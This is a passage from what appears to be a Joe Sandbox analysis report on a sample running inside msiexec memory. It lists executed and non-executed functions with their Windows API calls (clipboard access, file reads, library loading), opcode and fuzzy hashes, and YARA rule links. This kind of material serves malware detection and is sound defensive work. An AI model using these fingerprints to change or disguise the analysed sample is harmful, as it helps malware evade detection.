                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                                Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4218492932-0
                                                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1213725291-0
                                                                                                                                                • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                • API String ID: 2360000266-2664311388
                                                                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                Function 0041183A Relevance: 3.0, APIs: 2, Instructions: 44clipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2628231878-0
                                                                                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Version
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4255912815-0
